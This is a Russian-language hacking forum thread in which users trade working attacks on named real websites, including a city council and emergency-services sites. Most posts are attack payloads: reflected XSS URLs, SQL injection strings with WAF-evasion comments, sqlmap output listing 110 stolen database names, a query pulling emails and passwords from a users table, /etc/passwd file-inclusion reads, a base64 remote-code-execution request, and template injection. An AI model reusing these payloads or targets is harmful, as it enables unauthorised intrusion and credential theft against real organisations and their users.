Уязвимости SQLi, XSS и другие.

Code:

https://www.edmunds.com/a/?":""});alert(document.cookie);//
http://oregonstate.edu/training/course_search.php?subject="><script>alert(999)</script>
https://lyricstranslate.com/?page="><script>alert(7889789)</script>
http://720pizle.com/ara.asp?a="><script>alert(7889789)</script>
http://epinions.com/search/books/63715?"><script>alert(6456456)</script>
https://mgronline.com/south/1232/search?searchTxt="><script>alert(045839)</script>
http://naszemiasto.pl/firmy/,polska,78425,21.html?miasto="><script>alert(4389)</script>
http://www3.gogoanime.tv/"><script>alert(4389)</script>
https://bursadabugun.com/ruya-tabirleri/?q[keyword]="><script>alert(4389)</script>
https://computerhoy.com/listas/internet/mejores-cascos-auriculares-inalambricos-2016-32365?page=</title><script>alert(4389)</script>
https://warframe.market/</script><script>alert(4389)</script>
https://goal.in.th/%E0%B8%9C%E0%B8%A5%E0%B8%9A%E0%B8%AD%E0%B8%A5%E0%B8%A2%E0%B9%89%E0%B8%AD%E0%B8%99%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%87/?Line="><script>alert(4389)</script>
http://www.gazetevatan.com/Default.aspx?aType=';alert();//
http://thebitcoincode.com/video.php?poster="><script>alert(4389)</script>
https://gamebanana.com/tools?"><script>alert(4389)</script>
https://indosport.com/"><script>alert(4389)</script>
http://brasilescola.uol.com.br/"><script>alert(4389)</script>
https://watchasian.co/"><script>alert(4389)</script>
https://mgronline.com/south/1232/search?searchTxt="><script>alert(4389)</script>
http://portail.free.fr/services/pagesjaunes/bons-plans.php?where="><script>alert(4389)</script>
http://minnstate.edu/jobs/searchResults.php?"><script>alert(4389)</script>
https://eadaily.com/"><script>alert(00088)</script>
http://projectfreetv.bz/hd/project.php?title=<script>alert(4389)</script>
http://cnrtl.fr/lexiques/morphalou/licence_morphalou.php?version="><script>alert(4389)</script>

 

https://forum.antichat.ru/threads/426171/page-6
Выкладывал уже

 

Code:

http://wrestling.work/eventchapter.php?id=2%27+union+select+1,2,(select(@x)from(select(@x:=0x00),(select(0)from(tione_igs.applications)where(0x00)in(@x:=concat(@x,0x3c62723e,user,0x3a,pass))))x),4,5,6,7,8,9,10--+1

 

Code:

http://cpa-monsters.ru/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW

Spoiler: from sqlmap

Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
Payload: http://cpa-monsters.ru:80/" AND MAKE_SET(1782=1782,4508) AND "lURK"="lURK
Vector: AND MAKE_SET([INFERENCE],[RANDNUM])
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://cpa-monsters.ru:80/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: http://cpa-monsters.ru:80/";SELECT SLEEP(5)#
Vector: ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: http://cpa-monsters.ru:80/" AND SLEEP(5) AND "IisV"="IisV
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

Spoiler: bd

available databases [110]:
[*] 1poverennaya.ru
[*] 3dschool.akadem-art.ru
[*] acmoda_fashion
[*] akadem-art.ru
[*] amsterdam.ru
[*] amur-tiger
[*] api.olit.su
[*] apteki.ru
[*] at
[*] ayashiclimat
[*] berendeevo
[*] bitrix_55
[*] cargoflies.ru
[*] civlife
[*] cookies
[*] cpa
[*] cpa-monsters.ru
[*] crypto
[*] cv79250_db
[*] db1050525_rpfm
[*] dev.check-car.io
[*] dish.ru
[*] docdoc
[*] dojoy.ru
[*] dreamwood
[*] el-torg.ru
[*] fefectu_fikcii
[*] game4art.ru
[*] gidrolica
[*] greencontinent.bio
[*] hockeyfamily
[*] hostel
[*] information_schema
[*] informed
[*] irasmarovoz
[*] kordik-psyhelp
[*] kz_health
[*] lecture
[*] led1080.ru
[*] lesspas
[*] light
[*] lotmo
[*] mailer
[*] maxphoto
[*] medelement.ru
[*] messenger
[*] metalnastil.ru
[*] miel.ru
[*] modelery
[*] mototelega
[*] mysql
[*] nanokeratin-shop
[*] new.olit.su
[*] new_olit
[*] newoleg
[*] olit_su
[*] olmatveeva.ru
[*] pdns
[*] performance_schema
[*] photoluxor
[*] picture
[*] pineapple
[*] powerdns
[*] prazdnik
[*] pressnastil.ru
[*] profdoctors.ru
[*] push
[*] radio.ru
[*] recraft.ru-yii
[*] redmine
[*] rekomendacii
[*] remcraft.ru
[*] remcraft.ru-new
[*] remcraft.ru-new1!!
[*] resthistory
[*] rlogistika
[*] seobirds
[*] seorakerus
[*] seowant.ru
[*] sflegaladvice
[*] siluet.su
[*] sitemanager0
[*] skld
[*] social
[*] sound_olit
[*] sound_olit_su
[*] sport
[*] spz-rus.ru
[*] stroynastil.ru
[*] stroynastil.ru1
[*] sveng
[*] telegramm
[*] test
[*] umgear.ru
[*] union.ru
[*] union.ru-old
[*] vault-pdm.ru
[*] velespro.com
[*] videoportal
[*] visagestyle
[*] water-check.ru
[*] wawtalk.io
[*] webmonsters
[*] whoknow.ru
[*] yandex_bot
[*] yiilab
[*] ymga.ru
[*] ymga.ru-new
[*] zabbix
[*] zaem-info.ru

 

Здравствуйте)
На форуме первый день, попробую тоже.

1. SQL-инъекция с обходом WAF

Code:

GET /noticia.php?id=-738+/*!50000union*/+/*!50000select*/+111,222,/*!50000gROup_cONcat(table_name,0x0a)%20*/,444,555,666,777,888,999,1010,1111,1212,1313,1414,1515,1616,1717+from+/*!50000inforMAtion_schema*/.tables+%20/*!50000wHEre*/+/*!50000taBLe_scheMA%20*/like+database()--+ HTTP/1.1
Host: www.cdlmacapa.com.br
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

2. SQL-инъекция с выводом в ошибке

Code:

http://steelflex.com.br/subcategoria.php?id=1+AND+extractvalue(1,concat(0x3a,(select+user()+limit+0,1)))

 

Еще немножко - теперь LFI.

Code:

http://www.unisescon.org.br/index.php?pagina=/etc/passwd&evento=13774

https://www.fecic.es/admin/index.php?pagina=descargar&doc=../../../../../../../../../../../../etc/passwd&linial=true&seccio=premsa&tipus=1&[email protected]```

http://www.bolyai-zenta.edu.rs/index.php?page=../../../../../../../../../../../etc/passwd

http://www.crt.unige.it/EN/index.php?pagina=php://filter/convert.base64-encode/resource=/etc/passwd

 

Code:

https://www.bible-history.com/subcat.php?id=-1%20union%20all%20select%20user()%20--%20

rusty@localhost
5.5.62
bible_history

 

XSS
https://www.pinpics.com/searchT.php?keyw=<script>alert('test')</script>

 

XSS
1) https://elkomp.ru/search?sought=<script>alert('xss')</script>
2) https://kubnews.ru/poisk/?q=<script>alert('xss')</script>
3) http://ivgoradm.ru/find=<script>alert('xss')</script>
4) https://www.lapsi.ru/list.php?q=<script>alert('xss')</script>
5) http://brykury.com.ua/products/search?search=<script>alert('xss')</script>

 

SQLi:
SoftwareOnRent

Code:

http://softwareonrent.com/product.php?id=45%27%20union%20select%201,2,3,4,5,6,concat_ws(0x7c,database(),%20user(),version()),8,9,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--+&catid=1&compid=135

SOR|SORuser@localhost|5.5.56-MariaDB

Code:

http://softwareonrent.com/product.php?id=45%27%20union%20select%201,2,3,4,5,6,group_concat(column_name),8,9,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27users%27--+&catid=1&compid=135

SecurityDealOnline

Code:

http://securitydealonline.com/list.php?id=-19%20and%20extractvalue(0x0a,concat(0x0a,(select%20concat_ws(0x7c,database(),version()))))--+ 

bluewings|bluewings1@localhost|5.6.39-cll-lve

Code:

http://securitydealonline.com/list.php?id=-19%20and%20extractvalue(0x0a,concat(0x0a,(select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20)))--+ 

BrandTagz

Code:

http://www.brandtagz.com/products.php?category=-men%27%20union%20select%201,concat_ws(%27|%27,%20database(),user(),version()),3,4,5,6,7,8,9,10,11--+&&product=Dress%20Shirts

[brandtag|brandtag@localhost|5.6.39-cll-lve]

Code:

http://www.brandtagz.com/products.php?category=-men%27%20union%20select%201,%20group_concat(concat_ws(':',email, password),0x0a),3,4,5,6,7,8,9,10,11%20from user--+&&product=Dress%20Shirts

 

Rcadia

Code:

http://www.rcadia.com/page.php?pageID=-23%20union%20select%2012,3,4,5,concat_ws(0x7c,user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19

[email protected]|rcadia2|5.6.34-log

Городской совет, Черкассы

Code:

http://chmr.gov.ua/myrada/html/195784.php?id=-195784%20/*!50000uNioN*/%20select%20concat_ws(0x7c, database(),user(),version())--+

myrada|myrada@ns1|5.5.24-log

Индусо шоп

Code:

https://www.royalenterprises.co.in/category.php?cid=9%27%20/*!50000uNiOn*/+/*!50000sElEcT*/+%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+ 

myp13eyd_royal2|myp13eyd_royal2@localhost|5.6.32-78.1

Code:

https://www.royalenterprises.co.in/category.php?cid=-9%27%20/*!50000uNiOn*/+/*!50000sElEcT*/+%201,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18 from /*!50000infoRmAtiOn_sChEma*/.tables+/*!50000WhErE*/+/*!50000table_schema*/=database()--+# 

 

way.com

Code:

https://shuttle.way.com/waypanel/drivers/track-drivers-by-parking.php?pid=844
Parameter: pid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=844' AND 3141=3141 AND 'gxfZ'='gxfZ

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: pid=844' AND SLEEP(5) AND 'tJKn'='tJKn
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12

Code:

http://www.alicetinting.com.au/pop.php?ID=37 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178766271,(SELECT (ELT(8597=8597,1))),0x716a707171,0x78))s), 8446744073709551610, 8446744073709551610)))

 

Code:

https://temp-mail.org/en/?email="/onfocus='alert`lul`'/autofocus="@tmailcloud.net

 

rce (=

Spoiler: oops

шттп://www.t| u | torialspoint.com/

Stat on similarweb =)





PoC

Spoiler: query with params

Code:

from base64
UE9TVCBodHRwczovL3RwY2cudHV0b3JpYWxzcG9pbnQuY29tL3RwY2cucGhwIEhUVFAvMS4xCkNvbnRlbnQtTGVuZ3RoOiA3MgpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApIb3N0OiB0cGNnLnR1dG9yaWFsc3BvaW50LmNvbQoKbGFuZz1zaCZkZXZpY2U9JmNvZGU9LewmZXh0PXNoJmNvbXBpbGU9MCZleGVjdXRlPWVudiZtYWluZmlsZT1leGVjJnVpZD0x

 

ZoneAlarm

Code:

https://forums.zonealarm.com/ajax/render/widget_php
POST:
widgetConfig[code]=phpinfo();

 

Blind XSS в админке Hostinger, простите за ру сайт
https://crm.hostinger.io/client/29640132
PS: Зарепортил сказали спасибо и продлили хостинг на один месяц

 

Есть такой кардер который украл 36 милионов $ и отсидел 10 лет, сейчас у него канал на ютубе "Люди PRO", сам смотрю )
У него свой кэшбэк сервис в котором минут за 5 нашел Server side template injection, правда полезную нагрузку вывесть не смог (
https://secretdiscounter.com/ru/search/coupon?limit=30&query={{7*7}}.
+ XSS
https://secretdiscounter.com/ru/"//><script>alert(5)</script>

 

General Inspectorate for Emergency Situations

Генеральная инспекция для чрезвычайных ситуаций

Code:

https://www.igsu.ro/index.php?pagina=materiale_preventive%3E%3Cscript%3Ealert(666)%3C/script%3E

 

Promotora Española de Lingüística (Proel)

Code:

http://www.proel.org/index.php?sw=%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&pagina=searchresult